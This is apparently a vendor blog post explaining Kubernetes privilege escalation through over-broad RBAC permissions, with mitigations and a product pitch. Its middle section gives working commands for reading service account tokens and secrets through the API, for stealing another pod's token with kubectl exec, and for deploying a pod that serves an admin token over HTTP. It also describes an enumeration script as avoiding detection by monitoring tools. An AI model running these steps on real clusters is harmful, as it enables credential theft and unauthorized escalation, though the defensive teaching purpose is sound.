In Kubernetes, understanding identity escalation paths is crucial for managing security risks effectively. This blog post delves into defining highly privileged identities and exploring potential privilege escalation paths using highly privileged permissions.
Definition of a Highly Privileged Identity in Kubernetes
In Kubernetes, a highly privileged identity refers to entities such as users or service accounts that possess extensive permissions across the cluster. These identities typically hold roles or cluster roles with broad access rights, enabling them to perform critical operations including:
- Managing resources across multiple namespaces
- Performing administrative actions affecting the entire cluster
Key High Privilege Permissions and Their Implications
In Understanding Kubernetes Identities, Pt 1 we dove into what identities are and explored the permissions architecture in Kubernetes. In this article, we are going deeper to focus on interesting permissions and common ways to use them to traverse a Kubernetes environment – or even disrupt the environment.
This can be seen in the following permissions:
1. create pod
/exec
- Description: Allows running commands within pods.
- Impact: Can be used to execute commands in other pods, potentially extracting sensitive information or disrupting their operations.
2. get
/list
secrets
- Description: Allows access to the content of secrets.
- Impact: Secrets often contain sensitive data like access tokens, API keys, and passwords. Unauthorized access to these can lead to severe security breaches.
3. get
/list
configmaps
- Description: Allows access to the content of configmaps.
- Impact: Configmaps can contain sensitive configuration data, including usernames, passwords, and API keys. Access to this information can expose critical infrastructure details.
4. create
/update
/patch
pod
- Description: Allows deploying and modifying pods.
- Impact:
- Deploy Privileged Pods: Gain access to the node or perform unauthorized actions by deploying pods with elevated privileges.
- Steal Service Account Tokens: Deploy pods using service accounts to obtain their tokens.
- Deploy Malicious Pods: Deploy pods for unauthorized activities, such as mining cryptocurrencies.
5. create
/bind
role
/clusterrole
- Description: Allows creating and binding roles or cluster roles.
- Impact: Creating or binding roles with higher privileges can escalate permissions if you have the necessary rights to create or bind roles.
6. create
/update
/patch
/delete
node
- Description: Allows modifying or removing node configurations.
- Impact: Can disrupt the cluster’s network or affect node availability, impacting overall cluster stability.
7. create
/update
/patch
deployment
- Description: Allows managing deployments.
- Impact: Can be used to deploy unauthorized applications, scale deployments to overload resources, or disrupt services.
8. create
/update
/patch
service
- Description: Allows managing services.
- Impact: Can expose services to external traffic or misconfigured services, affecting accessibility and security.
Exploiting Kubernetes Permissions
Kubernetes permissions can be exploited for a number of different use cases, which we will delve into below.
Exploiting pod
/exec
and pod
/list
Permissions
With pod
/exec
and pod
/list
permissions, an attacker can enumerate pods and execute commands inside them. Here’s how this can be used for privilege escalation:
1. List All Pods in the Namespace:
curl -s -k --header "Authorization: Bearer $(cat /run/secrets/kubernetes.io/serviceaccount/token)" https://kubernetes.default.svc/api/v1/namespaces/default/pods | jq '.items[].metadata.name'
Copied
2. Retrieve the Service Account Token from Another Pod:
kubectl exec $POD -- cat /run/secrets/kubernetes.io/serviceaccount/token
Copied
Using secrets
/list
to Retrieve Service Account Tokens
With permissions to list secrets, you can use curl
to access and decode secret tokens:
- List the secrets:
curl -s -k --header "Authorization: Bearer $(cat /run/secrets/kubernetes.io/serviceaccount/token)" \
https://kubernetes.default.svc/api/v1/namespaces/default/secrets
Copied
- Get the content of a secret:
SECRET_NAME=<secret-name>
curl -s -k --header "Authorization: Bearer $(cat /run/secrets/kubernetes.io/serviceaccount/token)" \
https://kubernetes.default.svc/api/v1/namespaces/default/secrets/$SECRET_NAME
Copied
Create a Pod with a Highly Privileged Role
Attackers can also leverage this YAML to deploy a pod with the service account they want to steal:
apiVersion: v1
kind: Pod
metadata:
name: my-pod
namespace: default
spec:
serviceAccountName: admin-sa
containers:
- name: ubuntu
image: ubuntu:latest
command: ["/bin/bash", "-c", "apt update && apt install -y python3 && python3 -m http.server 8080 --directory /run/secrets/kubernetes.io/serviceaccount"]
Copied
Deploy the pod using curl
:
curl -k -X POST \
-H "Authorization: Bearer $(cat /run/secrets/kubernetes.io/serviceaccount/token)" \
-H "Content-Type: application/yaml" \
--data-binary @pod-deployment.yaml \
https://kubernetes.default.svc/api/v1/namespaces/<NAMESPACE>/pods
Copied
They can then access the web server on that pod, giving them the content of the token file:
curl http://$POD:8080/token
Copied
How to Mitigate Kubernetes Identity Risks
To effectively mitigate risks associated with highly privileged identities, consider the following measures:
- Least Privilege Principle: Ensure identities are granted the minimum permissions necessary for their role.
- Regular Audits: Conduct regular audits of identities and their permissions to identify and revoke unnecessary privileges.
- Monitoring and Alerts: Implement monitoring to detect unusual activities associated with high privilege identities and set up alerts for potential misuse.
- Network Policies: Use network policies to limit the communication paths within the cluster, reducing the impact of a compromised identity.
Pereef – the Kubernetes whoami+
Pereef
is a Bash script that leverages curl
and awk
to enumerate the permissions assigned to the service account in a container. This script simplifies the process of discovering and analyzing permissions without requiring additional package installations, making it suitable for a wide range of containerized environments where curl
is available.
Why Use Pereef
?
- Comprehensive Permission Analysis:
Pereef
provides a detailed list of actions permitted by the service account, allowing for a thorough evaluation of potential attack vectors. - Avoids Alerting Monitoring Tools: By directly querying permissions,
Pereef
minimizes the risk of triggering alerts from monitoring tools or CNAPP agents like Upwind, which can be sensitive to failed requests. - Optimized for Penetration Testing: Ideal for security professionals and pentesters,
Pereef
helps identify permission configurations that could be exploited, without the need to manually run and check each command.
Pereef
offers a streamlined approach to understanding service account permissions, enhancing your ability to conduct security assessments and identify vulnerabilities within Kubernetes environments.
RbacSurfer – Kubernetes Machine Identities Viewer
RbacSurfer
is a Python script that identifies and enumerates all service accounts within your Kubernetes cluster. It systematically lists the resources and verbs each service account can access and highlights those with highly privileged permissions. Additionally, RbacSurfer
reveals the pods associated with each service account, enabling a thorough risk assessment.
Why Use RbacSurfer
?
- Detailed Identity Overview:
RbacSurfer
provides a comprehensive list of all service accounts and their associated permissions, making it easier to manage and audit identities. - High Privilege Detection: The tool flags permissions considered highly privileged, helping you quickly identify potential security risks.
- Pod Association Analysis: By showing which pods each service account is deployed on,
RbacSurfer
allows for a more nuanced evaluation of potential impact and risk.
RbacSurfer
is an essential tool for Kubernetes administrators and security professionals, offering critical visibility into service account configurations and their implications for your cluster’s security posture.
How Upwind Protects Kubernetes Identities
Navigating the complexity of Kubernetes environments with numerous identities and permissions can be challenging. Upwind provides a solution to streamline this process and enhance your security posture.
With Upwind’s Identity Management module, you gain comprehensive visibility into all identities within your environment, including both human and non-human identities. Our platform not only displays these identities, but also provides detailed insights into their permissions, deployments, and associated security risks.
Key benefits of using Upwind include:
- Centralized Identity Visibility: Easily view and manage all identities across your Kubernetes environment.
- Detailed Permissions Insights: Understand the specific permissions assigned to each identity and their potential impact.
- Actionable Security Insights: Receive targeted alerts about critical security risks, helping you address potential vulnerabilities efficiently.
Upwind simplifies identity management and enhances security, ensuring that you can focus on what matters most without getting lost in a sea of data.
Learn More
To learn more about Upwind Identity Security, visit the Upwind Documentation Center (login required), or schedule a demo.